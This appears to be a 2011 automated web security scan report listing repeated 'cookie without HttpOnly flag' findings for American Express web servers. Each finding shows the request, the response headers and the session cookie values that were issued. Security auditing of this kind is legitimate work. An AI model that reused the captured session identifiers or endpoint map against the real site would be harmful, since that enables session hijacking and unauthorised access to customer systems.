<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:35 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944495304108; path=/; expires=Tue, 09-Feb-16 22:21:35 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JTfdlyvElahRUmUBPW_Sr5S:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:42 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944502510060; path=/; expires=Tue, 09-Feb-16 22:21:42 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000yq-Xh-WxMu4vUVCexozgN5B:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:27 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944487071298; path=/; expires=Tue, 09-Feb-16 22:21:27 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000rksCcDlHmzQipsUe7BzBjnC:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/home?sj_tabToOpen=1&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:23 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944483932373; path=/; expires=Tue, 09-Feb-16 22:21:23 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oFplttRUbELe348jm0hGGKR:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:11 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000HmJMpZYY_G5msSiTYEScCWJ:15bvkpc1o; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=252447242.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/marketingprograms?inav=menu_business_merchmarket HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000a-qFEyjWmRA77-ia4auLoKF:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 45136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/reportsandtrends HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:17 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=000014rUJ6zb3offa-6mrx3LyBv:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 47317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:28 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000nxFV_sTqmJW7c4-jAArCK9e:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:30 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000sm8JxdH8S2k1shfy-P8NSQw:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:40 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000yMXBfzRiROj5OAfOa5QNbix:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:43 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=000090KnSa_PToPYn1Y9A6kHv8g:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:34 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000ddg062iZbtkKQLHV7glhsR:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:38 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000vjRd_mY3YpSpW5gdtG8i9S:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:45 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000U01HD7ILpMUGqR_UyygusU9:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:39 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00002CcYYbt_TpWnMDtRNICsW6f:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:06 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000ah4vhZojFRvbev9f5GE_A4A:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:47 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000PTe6zKm28D31BsFXcYHD9d8:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalsavings.do?vgnextoid=d752e13f929a7210VgnVCM100000defaad94RCRD&page=7&inav=iNavUtilContact HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:16 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000fxhwIOrKDi2q99FOvTDSEpr:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 35307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/fxip/fxinternationalpayments.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:10 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000gNZ28gvXI_sQMcByieAazU2:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:19 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00005KkxZLI1O88IVa_7J24YNHg:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:41 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000uChEcdO9k6KqbMgMdp5Ow2Q:14t0oj3g0; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:49 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000NpczdATYAiPRlcF0VGZHggr:1563unio9; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=00008GQpyAcWkVMiczzEQLBcHuM:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do?inav=menu_myacct_creditsecure HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000ax6luTP71CaQfFifYiUvIPV:156jli4a5; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=h4s6ert0qi7j4rpn3nuck010f0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7sg72sp5qujgp16nj7smqcsl13; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ca.gif?rb=233&ca=20472701&ct=728106282%20height=0%20width=0%20style= HTTP/1.1 Host: a.rfihub.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: m="aABseW9eg==AI20472701AAABLevCTs8="; f="aABZd22cg==AK1296740536AB1AAABLevCTs4="; a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; e=cd; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014
Response
HTTP/1.1 302 Found P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: m="aACjOGo3g==AI20472701AAABLffNWaU=AI20472701AAABLevCTs8=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: f="aAC5a_jbQ==AK1296942586AB1AAABLffNWaQ=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Cache-Control: no-cache Location: http://ib.adnxs.com/seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
